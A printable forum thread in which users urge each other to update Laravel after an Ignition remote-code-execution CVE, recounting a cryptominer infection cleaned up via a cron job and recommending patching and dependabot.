Update your Laravel! - Printable Version +- Post4VPS Forum | Free VPS Provider (https://post4vps.com) +-- Forum: VPS Discussion (https://post4vps.com/Forum-VPS-Discussion) +--- Forum: VPS Protection (https://post4vps.com/Forum-VPS-Protection) +--- Thread: Update your Laravel! (/Thread-Update-your-Laravel)

Update your Laravel! - LightDestory - 03-28-2021 I open this thread to let you know that you must always update your software! Recently a new CVE has been filled that explain how to exploit a "Ignition" bug that allows the arbitraty execution of code. IT is really dangerous. One of my friend VPS has been infected buy a cryptominer, the aricle I am going to post here talks about Docker APIs but the same "malicious command" has been used on Laravel's exploting. He requested my help to eradicate that maleware... well it was a nightmare, killing the process was useless because a new one will start soon after. What you need to do is find a a cron job that let the malware in. Another CVE regards databse queries... but it is less dangerous that a miner inside your server! As the CVE article says, most of attempt of this exploit will result on "no result" from the query... Stay safe, stay updated! RE: Update your Laravel! - debjit - 03-29-2021 Yup update to latest bug fixes. Dont ise $request->all() or request()->all() to create, and hope for the best. This bug is hopefully fixed https://blog.laravel.com/security-laravel-62011-7302-8221-released RE: Update your Laravel! - tiwil - 04-01-2021 That's from January and it's April now hahaha. If you're using dependabot in GitHub like me, you will get notified soon after a package get updated. I'm pretty sure my Laravel is the newest but lemme check. Yep, it's the newest one.